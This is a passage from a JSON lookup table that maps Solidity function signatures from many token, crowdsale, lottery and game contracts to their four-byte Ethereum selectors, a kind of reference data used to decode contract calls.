"tokenCalculate(uint256,uint256)": "0x6b15c47c", "getPhase(uint256)": "0x16ef376b", "BitChordCrowdsale(address,address)": "0x1e5c6176", "transferTechSupport(address,address)": "0x597f7c35", "BIFAToken()": "0x595dcb68", "finishSale()": "0x8f86f5ea", "BoomstarterPresale(address[],address,address,bool)": "0x1fdaedf2", "updateRequestExpired()": "0x14bba8a2", "priceExpired()": "0x8f303df9", "setETHPriceManually(uint256)": "0x4a5a3d76", "setETHPriceLowerBound(uint256)": "0x3f2cdb53", "setETHPriceUpperBound(uint256)": "0x55d39bc0", "updateETHPriceInCents()": "0xac7a722e", "EthPriceDependent(address[],uint256,bool)": "0xc12719a7", "burnPassportToken(address,uint256)": "0x17dbe4f1", "isStrategy()": "0x0af72ad0", "toggleWhitelist(bool)": "0x80e3f1ad", "disablePOSReward(address,bool)": "0x1099f6fa", "BITTOToken()": "0xe0a60ea3", "cfoWithdraw()": "0x965b71bc", "calcNextPrice(uint256)": "0xdf851f03", "buy(uint16)": "0x1eabc116", "setCasinoName(uint16,string,string)": "0x5950cb8c", "addCasino(uint16,uint256,string,string)": "0x7d8978db", "initCasino()": "0xbf390355", "Partners()": "0xd1fa9cad", "setAssetToExpire(uint256)": "0x84f32395", "payInterest(address,uint256)": "0x1b7623be", "mintInterest(uint256)": "0xb1cc7c60", "_mint(uint256)": "0x2c526196", "_ownerSupply()": "0xf0285b96", "prefixed(bytes32)": "0x1f275713", "claim(uint256,uint256,bytes)": "0x5eddd157", "IOXDistribution(address)": "0x7fc56856", "EthAnte()": "0xfdcd649e", "withdrawGxTokens(address)": "0x156c2e82", "transferring(address,address,uint256)": "0x78dc6b7e", "Altruism()": "0x5ef8da77", "getCurrentRateByTokenSold()": "0x23bb8022", "getCurrentRateByStage()": "0xd977a59c", "getCurrentStage()": "0xeedbe31d", "checkCapNotReached(uint256)": "0x89b49d61", "founderWithdraw()": "0x84f85951", "postICO()": "0x0efd2cca", "buyTokensPreSale(address,uint256)": "0x2bc3656c", "confirmICOSpec()": "0x04f31a47", "setICOSpec(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x4d3eff3c", "createBountyContract(address)": "0x12f0f9df", "CerttifyCrowdsale(address,address,address)": "0x4109a71a", "enableWithdrawl()": "0xd5c61881", "setBounties(address[],uint256[])": "0x11d4f314", "issueCert(uint256,bytes)": "0xe1606013", "burn(uint256,string)": "0x7641e6f3", "CerttifyToken(uint256)": "0x17c520f9", "withdraw(address,address,uint8,bytes32,bytes32)": "0x8bdc5a5f", "verifyTransferSignature(address,address,uint8,bytes32,bytes32)": "0x5ac3835d", "cancelTransfer(address)": "0xa7c1e629", "getTransfer(address)": "0xdb0d5175", "changeVerifier(address)": "0xcf04fb94", "EtherLinkToken()": "0xb48c6807", "changeFoundation(address)": "0x65a5f1cd", "payFees()": "0x62779e15", "_updateState()": "0xf852b976", "calulateRate()": "0x1330a21f", "balanceMinusFeesOutstanding()": "0x24bb49d6", "submitted()": "0x708ddf7b", "leftInTier()": "0xf51fb6a1", "_start()": "0x53ef6781", "FUTMOTO()": "0x2c9b1625", "sendTokensToFounders()": "0x27e7c023", "setStateMigrated()": "0xde01ec28", "removeTokens(uint256)": "0xb8cb65ee", "countTokens(uint256)": "0xa3be094d", "returnFundsFor(address)": "0x7dfbdf6d", "importTokens(address)": "0xe3ba3398", "setNewTokenImporter(address)": "0xe3dd164e", "setNewManager(address)": "0xd30f945a", "init(address,address,address,address,address,address)": "0x99e133f9", "ImmlaIco(address,address,uint256,uint256,uint256)": "0xe72e46fd", "ImmlaToken(address)": "0x5413d6f4", "pie()": "0x8a95a746", "jump(uint256)": "0xc2ff3334", "poke(bytes32)": "0x1504460f", "LiteBoxToken(address,string,string,uint256,uint256)": "0x9afd8b1d", "BRDCoin()": "0xe33bb62a", "CNBCoin(uint256,string,uint8,string)": "0x699084f4", "Eetgccoin(uint256,string,string)": "0x71543f39", "CryptoLottoCoin()": "0x02491bd5", "TombCore()": "0xb2be8180", "buyAndCrave(string)": "0x60f2e1c0", "getTombDetail(uint256)": "0x01dee025", "getAllTombs()": "0xd1cb0f0f", "getTombByOwner(address)": "0xd8966ad3", "_createTombWithData(address,string)": "0xf6bffff8", "ArysumToken()": "0x0cb09309", "updateMintingStatus(uint256)": "0x8d8001ad", "totalBGX()": "0xa3a81d40", "preICOSupply()": "0x00c5f509", "maximumICOCap()": "0x611eb470", "verifiedWinnersLastCount()": "0xa250f43b", "deathData_a12()": "0x367ebb99", "currentAirdrop()": "0x03f14e96", "weiRaisedIncludingFiatCurrencyRaised()": "0xe014a39f", "captcha()": "0x3ce819e2", "burnAllRemainingIBC()": "0xd0c426e6", "keys()": "0x307540f6", "MaxAirDropXblock()": "0xcd3a1dde", "bonusPhaseThreeDeadline()": "0x812403f6", "preSaleEndDate()": "0x7967a50a", "feePeriodStartTime()": "0x78dc70c0", "totalAllocatedToAdvisors()": "0xd966cfc3", "stopBountyMint()": "0x64bfc9a5", "rvt()": "0xb7618a31", "capFiat()": "0x2f7a7192", "omegaPerEther()": "0x0506689a", "_price_tokn_ICO()": "0xdb8ee692", "prices()": "0xd3419bf3", "PURCHASE_PREMIUM_RATE()": "0x5dd48b04", "w_Bounty()": "0x376c7374", "preSaleFirstBonus()": "0xb36a06b5", "dailySpent()": "0x0bc6b89c", "imageGenerationCodeMD5()": "0xb269eaff", "landmarkPriceStepNumerator()": "0xe8bfe5b8", "proposalCensorshipFee()": "0x21f3f338", "freezeProhibited()": "0x4d562c82", "shopStoreNextId()": "0xbcfffab8", "bountyP()": "0x57271a93", "maxProfit()": "0xb539cd55", "preIcoPrice()": "0x249aa292", "lastBlock_a8()": "0x427e332f", "MIN_TOKENS_TO_EXCHANGE()": "0x8be97285", "nextUpgradeMaster()": "0xfa967415", "minorEditsAddr()": "0x16b08755", "amount5kUsdInCents()": "0xeb7c244d", "softFundingGoal()": "0xdae392ee", "tokensForDevelopment()": "0xef8700e5", "disableCharity()": "0x7d534aa0", "sellerGuaranteeEther()": "0xe9cf287a", "weiToReceive()": "0x01515a7b", "preIcoFinished()": "0xa9b0c5a4", "currentRoundSupply()": "0x7f349329", "lockMin()": "0xf1c9cc11", "isAllocated12()": "0xbdd83add", "objectKnife()": "0x5875caaf", "chemistry()": "0x0f18a530", "burningAdress()": "0x85a10b30", "earlyPurchaseClosedAt()": "0x25bae118", "bountyMaxTokens()": "0x9b985b30", "TotalOwnerSupply()": "0xc55425e6", "timeFrame()": "0x8b13b64b", "_yearThreeClaimed()": "0x4c9478ce", "cSale()": "0xed188f33", "nextPunkIndexToAssign()": "0x52f29a25", "rand1()": "0x2d7cd4cd", "icoEndTimestampStage()": "0xaf8d5a48", "advisorPool()": "0x11fdff0c", "addressPremineBounty()": "0x0d694114", "numberOfPreviousEntries()": "0x29b0ffea", "addr_communityBuildingToken()": "0x2cc1b92a", "TokenOne()": "0xed28d37f", "purchaseCoffee()": "0xdfa5a25d", "gen0Profit()": "0x4d42fc66", "KNCBalance()": "0x6f882086", "companyCurrentPeriod()": "0x18fc6513", "iwtfundtokens()": "0xc75902cf", "organizer4()": "0xb5125493", "losePooling()": "0xd97c5be5", "GoldOwner()": "0xdda13903", "marketplaceManager()": "0x1889500c", "red()": "0x2930cf24", "ICO_PRICE()": "0xa715bf33", "tokensReleasedToTeam()": "0x932cd73e", "pollBurnQty()": "0xc81ede67", "purchaseBronze()": "0xff65e44a", "presaleEthAmountsProcessed()": "0xaaa04812", "the365address()": "0x64ebd70d", "preSaleFourthCap()": "0x2050c26e", "databaseContract()": "0x6c1247e5", "INVERSE_BASIS_POINT()": "0xcae6047f", "timestamp_contract_start()": "0xc78c0138", "amountOfTokensPerEther()": "0x77773d90", "getCofounditTokenAddress()": "0x8b044a50", "bonus3()": "0xab86ba3a", "ADVISORY_TEAM_PORTION()": "0xc1a6ec6a", "etherOne()": "0xc42e04c0", "getOwnerCEO()": "0xd3f73bd4", "ethCollector()": "0x745d1d64", "leveRage()": "0xc42edf88", "ERC20address()": "0x22dc5a85", "buyBlockCDN()": "0xa1155f5c", "isTradableFciInSession()": "0xc84c692a", "ownerAccount()": "0xea47cb24", "preIcoTotalCollected()": "0x94169f25", "Start3()": "0xbf0df0c1", "secondaryGasLimit()": "0x2a8faf95", "consul_price()": "0x02064b42", "getVersionSelectors(bytes32,bytes32,bytes32)": "0x31bab608", "getVersionImplementations(bytes32,bytes32,bytes32)": "0x90430c00", "getVersionIndex(bytes32,bytes32,bytes32)": "0x5a8194d2", "getLatestVersion(bytes32,bytes32)": "0xbd4a359d", "registryRead(bytes32,bytes32)": "0x424976f9", "updateExec(address)": "0xc64a3239", "updateInstance(bytes32,bytes32,bytes32)": "0xecf836ba", "appSelectors(bytes4)": "0x01c355df", "appIndex()": "0xc8d8cf88", "DucLongToken()": "0x3f46a2ea", "getPerformance(uint256)": "0x47625694", "addPerformance(string,uint32,uint8,uint8,uint8,uint16,bool)": "0x20323763", "getAvailableSeats()": "0x906d895d", "setAvailableSeats(uint256)": "0x3ad0d840", "LegalToken()": "0xd9a96c92", "_whichCourse(uint256)": "0xe78f5412", "_printACourse(uint256)": "0x555d8e3c", "_clearAllRequest()": "0xee683d2d", "_rejectCertificate(uint256,bool)": "0x445e4979", "_approveCertificate(uint256,bool)": "0xfdab5627", "_amountReq()": "0x98c086d8", "_applyForCertifation(string,uint256,bool,string,string,uint256)": "0x5666496a", "_amountCourse()": "0xed429d1b", "resultOf(uint256)": "0x71bfabca", "printCourse0(uint256)": "0x96f494d1", "_addCourse(uint256,string,uint16,uint16,string,string)": "0x84fb24a5", "ZferToken(address,uint256,uint256)": "0x1177275e", "LazyToken()": "0x60312cdd", "Kalypso()": "0x4c3f333f", "MoneroGold()": "0xa0cf01d4", "about(uint256)": "0x24bdaf95", "Goldplatina()": "0xb7667603", "changeRatio(uint256)": "0xf6a33253", "ModifyVigencia(uint256)": "0x6a24d595", "ALBtoken()": "0x9144f267", "RealTimeRayTracing()": "0x3b47d37a", "buy_token(address[],uint256,uint256)": "0x25d988bb", "_getUsdAmount(uint256)": "0x8486d444", "changeWhitelister(address)": "0x966aeece", "isWhitelised(address,address)": "0x9086de3b", "disableWithdrawal()": "0x30d12640", "enableWithdrawal()": "0xd857561d", "CashPoints()": "0x2ccf16f9", "chop(string)": "0xc407c6d8", "split(string)": "0x2a7b2c93", "Miner()": "0x02abb4c5", "MailHustleCrowdsale()": "0x220d9944", "EidosToken(address,address)": "0x2c3a15a0", "BoonyToken()": "0xb105be51", "getExpirationTime(bytes32)": "0xa1454830", "getCreationTime(bytes32)": "0x6f79301d", "getFundsOwner(bytes32)": "0x62c3fdb2", "getAccountBalance(bytes32)": "0xebf701e0", "updateDomainPrice(bytes32,uint256)": "0x6370ef19", "setDomainPrice(bytes32,uint256)": "0xb7bdc7ef", "migrateAccount(bytes32,bytes32,uint256,uint256,address)": "0xff25af24", "migrateDomain(bytes32,uint256)": "0xe638d76d", "moveAccount(bytes32,bytes32)": "0x771548e2", "updateFundsOwner(bytes32,bytes32)": "0x5ead8846", "release(bytes32,bytes32)": "0x2af8b645", "register(bytes32,bytes32,address,bytes32,bytes32,string)": "0x2a2a6434", "returnOffer(uint64)": "0xc1cc0046", "returnBetAndOffer(uint64)": "0x2c308714", "deleteData(uint256)": "0x4fe8b4c1", "createData(string,string,string)": "0x460f740e", "getDatasCount()": "0x923b9480", "utrToken()": "0x7e1ab812", "Q8ECOIN()": "0x61c1f224", "EtheeraToken(address)": "0x0df104d7", "VictorieumNewICOToken()": "0xd11f5b9f", "transferHomeViaRelay(address,uint256)": "0xdf77eb1e", "ForeignBridge(uint256,address[])": "0xc6ddd889", "myShare()": "0x77bf8e6f", "setUntradeable()": "0x33278aae", "setTradeable()": "0xc1cda902", "koreanCitizen()": "0xcb244f65", "favoriteNumber()": "0x471f7cdf", "ethAddress()": "0x41398b15", "calculateSha3(string)": "0x08af723e", "balanceLoc(address)": "0x30124349", "greaterThan(bytes32,bytes32)": "0x10d26354", "greaterHash(bytes32,bytes32)": "0x75d427e2", "keyGt(bytes32,bytes32)": "0xc635bf38", "getsumdata2(bytes32)": "0xcc0238be", "getsumdata1(bytes32)": "0x5d50601b", "Storesumdata(bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,uint64)": "0x4d712228", "summaryData(address)": "0x9fba2578", "BitmassXToken()": "0xe6c54139", "setTransferEnabled()": "0x49f16ad1", "setVestingAmoundAndApproveCrowdsale(address,address,address)": "0x3f34dd5c", "checkcoursestudent(address)": "0x734bb97e", "rejectCetification(address)": "0xbcd9cc60", "approveCetification(address)": "0xb6bb38dc", "checkStudentsApply()": "0xa743a61f", "getcoursesLenght()": "0x690c11d5", "applyforCetification(string,string,string,string,string,string,bool)": "0x27c725e1", "addCourses(string,string,string,string,string,string)": "0x852980a0", "UnityToken(address,uint256,uint256)": "0xce7e23a0", "Test(address)": "0xaa9449f2", "Aster()": "0xc60880e0", "isApprovedTransferer(address,uint64)": "0xe6d41b39", "isCardTradeable(uint64)": "0x2afb9fb1", "getCard(uint64)": "0xcfbed755", "getPlayersCollection(address)": "0x7e944756", "updateMarketContract(address)": "0x13c13d6b", "getNextDropTime()": "0x8f5ab947", "listSingleCard()": "0xf1bfb9cd", "listNextFourCards(uint128)": "0x3345b65f", "mintNextCard()": "0xe3906b3d", "updateStorageContract(address)": "0x8fb6d997", "upgradeCardConfig(address)": "0x71b80b8f", "generateCostFromAttributes(uint8[14])": "0x54ed44f7", "generateRandomSpell(uint8[14],uint32)": "0xda7ffbd4", "generateRandomMonster(uint8[14],uint32)": "0x479834ca", "generateRandomCard(uint32)": "0xf1b46bc8", "saveGenCode(address,uint256)": "0xef92b384", "BCP(uint256,string,uint8,string)": "0xc0086b19", "setEnd(uint256)": "0x7f498ffc", "GoldeaBonusCalculator(uint256,uint256)": "0xecdc7135", "CelsiusToken(uint256)": "0x1c61babe", "lookup(address[],address,address,bool,bool)": "0x845238fe", "ERC20Lookup()": "0x85fed812", "SDR22(uint256,string,string)": "0x0c2b663c", "Reservation(address)": "0x7b92a2de", "BEZOS()": "0xb800b2fe", "HKD_Omnidollar()": "0x4aa2f0f5", "UNITYCOIN()": "0x516edc99", "takeInvest()": "0xf8eff67c", "orderFor(address)": "0x967dd0ae", "changeEtherCost(uint256)": "0x299cdc9d", "OrganicumOrders()": "0x7b1ae67a", "MNLTGUNE()": "0xddc33450", "WeToken(address,string,string,uint256,uint256)": "0x71ac5c60", "VantageCoin(uint256,string,uint8,string)": "0x4b886f09", "DhaCoin(uint256,string,string)": "0x392cb9ed", "addHash(address)": "0x70d22f14", "setSUTokenContract(address)": "0xd1cd7bfa", "AddHash()": "0x0b714b17", "scheduleNewDerivativeToken(address,address,uint256)": "0x47156810", "claimDerivativeTokens()": "0x7097048a", "LCS()": "0xdd2a07a0", "withdrawERC20Tokens(address)": "0x4ff7ff32", "EcoValueCoin()": "0x7b473783", "DIVIUMx2()": "0xacfb4b26", "getWinningDetails(uint256)": "0x02f050e4", "getChosenNumbers(address,uint256,uint256)": "0xabb70034", "setPercentOfPool(uint256[])": "0x2c2b4358", "setWithdrawBeforeTime(uint256)": "0x3258e255", "setRafEnd(uint256)": "0x16330c55", "setDisbursingAddr(address)": "0x4c6fc20f", "setEthRelief(address)": "0x34785e79", "setFreeLOT(address)": "0x414b49a2", "setPayouts(uint256,string)": "0x9e48d2fd", "setTake(uint256)": "0x9c1a32fe", "setTktPrice(uint256)": "0x37dda1ae", "setOraclizeString(string,string,string,string)": "0x585b7752", "manuallyMakeOraclizeCall(uint256,uint256,bool,bool,bool)": "0x50894456", "getMatches(uint256,address,uint256)": "0xaadbc5a0", "setPayOuts(uint256,string)": "0x4f6adf48", "splitsSingle(uint256,uint256)": "0xd193a0ca", "oddsSingle(uint256)": "0x3d8c5af4", "splitsTotal(uint256,uint256)": "0x6cd2b458", "oddsTotal(uint256,uint256)": "0xc7939f34", "setWinningNumbers(uint256,string)": "0xb93806ab", "stringToArray(string,string)": "0xb2cfdfda", "disburseFunds(uint256)": "0xcc212a48", "reclaimUnclaimed()": "0xf5aa19b7", "winFreeGo(uint256,uint256)": "0x9e9eb444", "withdrawWinnings(uint256,uint256)": "0xe0a27b2c", "buyTicket(uint256[],address,uint256,uint256)": "0x942ab286", "enterFreeRaffle(uint256[],uint256)": "0xa4e8e360", "enterOnBehalfOf(uint256[],uint256,address)": "0xe3c79a20", "enterRaffle(uint256[],uint256)": "0x0f7bd1dd", "pauseContract(uint256)": "0xc2852f38", "newRaffle()": "0x0fd68e3f", "Etheraffle(address,address,address,address)": "0x54f1bb4b", "addToPrizePool()": "0xb3ede13f", "GWBCoin()": "0xcfe3e683", "GazeBountyCoin()": "0xbc0ae61e", "mintAfterSale()": "0x1d5b9efe", "AortaToken()": "0xe2331332", "userChallenge()": "0x7d6f3781", "LATOPreICO()": "0x94f5a1af", "fundManually(address,uint256)": "0xc4454980", "getIcoDiscount()": "0x37aa1689", "sendEtherManually(address,address,uint256,uint256)": "0xd6872352", "buy(address,address,uint256,uint256,uint256,bool)": "0x0cc966fa", "CAIDCrowdsale(address,address)": "0x2bd21738", "NARCoin(address,address)": "0xee4fb202", "setLock(uint256)": "0xd3e15747", "FAST()": "0xe4c92731", "Gig9()": "0x510c58c9", "decreaseBalance(address,uint256)": "0xff056949", "increaseBalance(address,uint256)": "0x5b86f599", "updateTokenTransferAddress(address)": "0xaad7152b", "updateModuleStatus(address,bool)": "0x4e91ca3a", "Balances()": "0x72f4ecab", "Lazadex()": "0x18f96857", "backSggCoinOwner()": "0x1c53faf8", "SggCoin()": "0xdf91f2ab", "createLottery(address,string,string,uint32,uint32,uint8)": "0x840d7fb6", "getLotteriesByOwner(address)": "0xd1fd260e", "_recharge(address,uint256)": "0xcca40111", "resumePlayer(address)": "0x03c63869", "freezePlayer(address)": "0x4296b4a7", "joinClub(address)": "0x1b49d82b", "getBalanceOfPlayer(address)": "0x852a6bd4", "setHKHcoinAddress(address,address)": "0x2f158162", "buyIt()": "0xea0599c7", "confirmCollRecv(uint256)": "0xa300c6ae", "Sepp(uint256,string,uint8,string)": "0x671baae3", "sendAllFeeToAddress(address)": "0x46aa6644", "ISSToken()": "0x35ee72c7", "updateVIPs(address)": "0x87cef144", "advertisementPayment()": "0x0332c6d4", "ScabbageToken()": "0x7975752c", "demotest()": "0xcb35ef2c", "SonDepTrai()": "0x759c01dc", "getCitationRecordsLength(bytes32)": "0x406a318e", "getCitationRecord(bytes32,uint256)": "0xc7adef28", "cite(bytes32,string)": "0xccd96ab0", "seal(address,uint256)": "0xe7a33822", "setSealableProperty(uint256,bytes32,bytes32)": "0x84bcd93e", "split(uint256,uint256,uint256)": "0xcaf0887d", "setMintableProperty(uint256,bytes32,bytes32)": "0x5a36f4f3", "tokenSealer(uint256)": "0x6b6ee875", "sealableProperties(uint256,bytes32)": "0x9f13c4c7", "mintableProperties(uint256,bytes32)": "0x11b059c6", "AdminClaimAirdropMultiple(address[],uint256)": "0x25e3172b", "AdminClaimAirdrop(address,uint256)": "0x5076d445", "azatipToken()": "0x4b496444", "test3(uint256)": "0xf7adc48f", "test21(uint256)": "0x6e1907cc", "setDeprecated(address)": "0x0d5866e2", "withdrawal(uint256,address,uint128)": "0xf0ff6ac4", "convertRate(address,bytes32,bytes,uint256)": "0x303a88b4", "pay(uint256,uint128,address,bytes)": "0x2646bfcb", "lend(uint256,bytes,address,bytes)": "0x20a7d5c3", "fixAdvance(uint256,uint64)": "0xb0933f25", "buildIdentifier(address,address,address,bytes32,uint128,uint128,uint256,uint32,uint64,uint64,string)": "0x27c42050", "requestLoan(address,address,bytes16,uint256,uint128,uint128,uint16,uint64,uint64,string)": "0x0b39c3e1", "getCurrentDebt(uint256)": "0x13c8e60d", "getCheckpoint(uint256)": "0x20fc4881", "getLentTime(uint256)": "0x9a276186", "getInstallmentDuration(uint256)": "0x87feba8f", "getInstallments(uint256)": "0x6ecc9ad9", "getCuota(uint256)": "0x6fd5790d", "SetMiningEnable()": "0xbbf1e6d0", "Tabbo()": "0x5ab6eb7a", "NicksTastyToken()": "0xdfe346d0", "GamersToken()": "0x48c81c16", "NiteshToken()": "0xe3973b5a", "GoToken()": "0x024fd912", "createTokenUri(address,address,address,address,address,address,address,uint256)": "0x5453f4e7", "getBalanceOfContract()": "0x22968885", "createCustomPresale(uint256,uint256,uint256,address,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xde8b1d5c", "MangaCoin()": "0xced0bcc3", "ProdEToken()": "0x49f27c25", "PinkyToken()": "0xefce6e78", "enableSudo(bool)": "0x76855764", "FXT(address)": "0xa9f79f7d", "turnBackTime(uint256)": "0xb1e8aea8", "setWhitelistAgent(address,bool)": "0xf74e8655", "OfferZone()": "0x54722412", "tOS(address)": "0x75ed8f89", "BioStem()": "0xd706df8c", "AfriHealthCoin()": "0xad23ad92", "CPF()": "0x5435dbd4", "kanaabbcwalletcoin()": "0x81fd63c2", "EmporioExchage()": "0xdf0d05d9", "etherToSendSecurityPool()": "0xba102763", "paySecurityPool()": "0x17f1ee05", "KDI()": "0x2bfc33ee", "AcceptsKDI(address)": "0x1f8e9143", "HDILToken()": "0x820935dd", "getLockedAvailable(address,string)": "0x21765510", "getRules(string)": "0xa412c6fc", "BancorNetworkToken()": "0x2d47adcb", "Testokenmaking()": "0xe468dc16", "setOutcome(bytes32,uint8)": "0xca7e88ba", "set(uint256,string,string,string,string,string)": "0x2ccbd053", "geProposalInfo(uint256)": "0xd6d3286c", "rollDices()": "0x8f6218a3", "LIFEWORLD()": "0xf6950d5f", "ProdDToken()": "0x73599205", "TalksChain()": "0x93395d99", "implementsERC165InterfaceNoCache(address,bytes4)": "0xb7056765", "updateERC165Cache(address,bytes4)": "0xa41e7d51", "implementsERC165Interface(address,bytes4)": "0xf712f3e8", "GenesisInitialSupply(address,address)": "0xa87ffd1d", "GenesisRewardPerBlock(address,address)": "0x1667590d", "GenesisBuyPrice(address,address)": "0x51192814", "IsGenesisAddress(address,address)": "0xe7514287", "BuyGenesis(address,address)": "0x771ad078", "SetGenesisBuyPrice(uint256)": "0x4a26410b", "TransferGenesis(address)": "0xcf91e331", "setGenesisCallerAddress(address)": "0x2704355c", "setGenesisAddress(address,address,uint256)": "0x435dc3fb", "Artemine()": "0x5f84e343", "NEWT()": "0xeccd1a8d", "_isTokenOperator(address,uint256)": "0xb9474959", "_isTokenOwner(address,uint256)": "0x976371c9", "AxieERC721BaseEnumerable()": "0x072b9c83", "AxieAccessControl()": "0x99248d3e", "setGeneScientist(address,bool)": "0x1f8df2cd", "setMarketplace(address,bool)": "0x7419e77a", "setByeSayer(address,bool)": "0x81b2dad9", "setSpawner(address,bool)": "0x9f186edb", "setGeneManager(address)": "0x927aaa7c", "setMarketplaceManager(address)": "0x2ffb054e", "setRetirementManager(address)": "0x1a68b1a1", "setSpawningManager(address)": "0x8c37e31e", "setWhitelistSetter(address)": "0x547a5eee", "AxieDependency()": "0x7b8d9930", "isEvolvementAllowed(uint256,uint256)": "0x9613bc90", "isRetirementAllowed(uint256,bool)": "0x18dcdfbe", "isRebirthAllowed(uint256,uint256)": "0xd4d33ece", "isSpawningAllowed(uint256,address)": "0x0e972421", "ERC165()": "0x909540cb", "burnTrusted(address,uint256)": "0x6cd8fa85", "mintTrusted(address,uint256)": "0xea31d56b", "BitVideoCoin()": "0x45bcd68f", "getTrustedContracts()": "0xf11be7c1", "removeTrustedContract(address)": "0xbf892eaa", "addTrustedContract(address)": "0xf0314df0", "findTrustedContract(address,address)": "0xd57869d4", "claimAllTokens()": "0x1e4bd42c", "getDeposit(address,uint256)": "0x2726b506", "getDepositCount(address)": "0x13fcaf54", "depositTokens(uint256,address,uint256)": "0x015bf264", "TokenHolder(address)": "0xfe32c448", "TradeToken()": "0xdf99f8bf", "CCTHCoin()": "0xc19c9a21", "AUMToken()": "0x53db6b21", "Cipher()": "0x3eed5d17", "BCC()": "0xdfb01c8f", "Ktx(uint256,string,uint8,string)": "0xd6063225", "ProofOfSheepM()": "0x6ebf5223", "FixBet51()": "0xf7f3ad16", "OasisToken()": "0x9afe340f", "Tenteniy()": "0x7e8bca6f", "QuantorToken()": "0xc2febe49", "HDToken99(uint256,address)": "0xe827ff89", "updateLimit()": "0xafd51a6e", "ReleaseableToken(uint256,address)": "0xb08d2718", "push_or_update_key(uint256)": "0x2284e8fe", "unlockBalanceByKey(uint256,uint256)": "0x31806aaf", "releaseLockedBalance(uint256)": "0x151110b0", "releaseLockedBalance()": "0x323661f6", "transferLockedToken(uint256)": "0x401b57b5", "BYToken()": "0x67be97a5", "modifyNextCap(uint256,uint256)": "0x32cc6a9f", "modifyCap(uint256)": "0x7e4930ae", "PresalePool(address,uint256,uint256,uint256)": "0xac14c61e", "isPaidUntil(address)": "0x15c7ff34", "DelphiToken()": "0xad76423e", "SteriliumToken()": "0x07d15ffd", "WEBCOIN()": "0xde24d3ba", "Magexbit()": "0xc5350345", "FirstERC20TestToken()": "0x4c703ccd", "TCTToken(uint256,string,string)": "0x22848a0c", "offer(address,uint256,uint256)": "0x74a46050", "awardPrizes(uint256)": "0x39965233", "rand(uint32,uint256)": "0xa0fffd5f", "addParticipant(address,uint8)": "0x442cbcb3", "migrate(address,uint40,uint40)": "0xedc9f182", "isOnAuction(uint40)": "0x2177885d", "post(string,string)": "0x0ae1b13d", "Guestbook()": "0x8937a0e8", "EthereumExtreme()": "0xff39ae55", "ETTCE()": "0xf7683b37", "ALIToken()": "0xdc542c0f", "SimpleAuction()": "0xa9d3da74", "ETGOLDToken()": "0x963630a3", "BTML()": "0xf54e3977", "sendSoldTokens(address,uint256)": "0x33ce724a", "ALLN()": "0xa18ef171", "outstandingValue()": "0x14189a7e", "holderBalance(address)": "0xab6ddfa8", "move(address,int64)": "0x0691d0bf", "allocate(address,int64)": "0x2f1a2e72", "SpaCoin()": "0x3f0f7248", "SafePromo()": "0x14e4a723", "NihilCoin(uint256,string,uint8,string)": "0xa91aae63", "MoncryptToken()": "0x51b59341", "MOOSToken()": "0x04306d69", "unFreeze()": "0x7cf12b90", "burnRemainingTokens()": "0x83408d73", "EventEmergencyContinue()": "0xc8d840fa", "EventEmergencyStop()": "0x50a82265", "PriceThreeDisable()": "0xdbd760ca", "PriceThreeEnable()": "0xfac416ab", "PriceTwoDisable()": "0xbdef744b", "PriceTwoEnable()": "0x2afcf433", "PriceOneDisable()": "0x9ee5451d", "PriceOneEnable()": "0xc99d89fc", "InitialPriceDisable()": "0xf909640c", "InitialPriceEnable()": "0x0464f4b2", "VirtualExchange(address)": "0x48da95b8", "BetPower()": "0x4076a248", "HumanStandardToken2(uint256,string,uint8,string)": "0xa25ff42d", "compare(uint8,uint256)": "0x171c0077", "play_game(uint8)": "0x7741ad4e", "stone()": "0x0167eb85", "scissors()": "0x1f2a3e06", "paper()": "0xf8c587ac", "ERC20TokenComplete(uint256)": "0x211a0f39", "TTT(uint256,string,uint8,string)": "0x47c81f22", "NewMyToken()": "0xbd1b324c", "EGYPTTEST()": "0x5bbe8a33", "setWhitelist(address,address,bool)": "0x1bdbce49", "onTransfer(address)": "0xb3c5998d", "BECTStandardToken(uint256,string,uint8,string)": "0xad108280", "TestTokenToken()": "0xecc7e7bc", "signVer(address,bytes32,uint256,uint8,bytes32,bytes32)": "0xb6ccc6ba", "Diploma()": "0x830f3d8a", "BIKSPRO(uint256,string,uint8,string)": "0x51d2a8fe", "record(string,string,string,address,bool)": "0x5e4e7cbc", "showProfileDetails()": "0xb6f5e0e6", "showEducationDetails(uint256)": "0x1e120efb", "showCertificationDetails(uint256)": "0x3716bd22", "updateProfileDetails(string)": "0x1f83d75e", "updateCertification(uint256,string,string,string,uint16)": "0x731f93c5", "updateEducation(uint256,string,uint16)": "0x3a5b2080", "setUserEmail(string)": "0xea448370", "checkPermissions(address,address)": "0xb861be22", "EtherAuction()": "0x6cadd040", "EatToken()": "0x3fab8fb0", "createCrowdsaleTiers(bytes32[],uint256[],uint256[],uint256[],uint256[],bool[],bool[])": "0x4ae2c351", "cancelRecurringPayment(bytes32)": "0x80ab611e", "YToken(uint256,string,string)": "0x0a62db33", "SupermarketKontrak()": "0x3640ca5b", "incSupply(uint256)": "0x0553fd5b", "sendLimitTokensToFounder(uint256,uint256)": "0x5c4e10e8", "sendAllTokensToFounder(uint256)": "0x853f636b", "sendLimitTokensToCompany(uint256)": "0x50f0880e", "sendTokensToCompany()": "0x61fd8f1b", "sendLimitTokensToPartner(uint256)": "0xfe8311db", "sendTokensToPartner()": "0x623670b2", "setNewIco(uint256,uint256,uint256,uint256,uint256)": "0x8b5e6679", "RobotTradingIco()": "0x57c67ad1", "RobotTradingToken(address)": "0xf94c81c3", "dateBonus(uint256,uint256,uint256)": "0xcf4cea67", "transferMerchantProxy(address,address,uint256,uint256,uint8,bytes32,bytes32)": "0x81c79fd5", "setMerchantRate(address[],int16)": "0xb4e56e01", "HanYinToken()": "0xc74266b3", "transferReverseProxyThirdParty(address[],uint256[],uint8[],bytes32[],bytes32[])": "0xc21de274", "transferReverseProxy(address,address,uint256,uint256,uint8,bytes32,bytes32)": "0x55cf969d", "_transferWithRate(address,address,uint256)": "0xce00d49c", "getReverseFee(address,uint256)": "0x21d45bec", "getReverseRate(address)": "0xa32cb608", "getTransferFee(address,uint256)": "0xfc42b58f", "getTransferRate(address)": "0x257714db", "removeReverseRate(address[])": "0xc12a0fd7", "removeReverseRate(address)": "0xd5f868b7", "setReverseRate(address[],int16)": "0x7857f6e7", "setReverseRate(address,int16)": "0x621bc379", "removeTransferRate(address[])": "0x16d3aa92", "removeTransferRate(address)": "0x47cd3fda", "setTransferRate(address[],int16)": "0x295310bf", 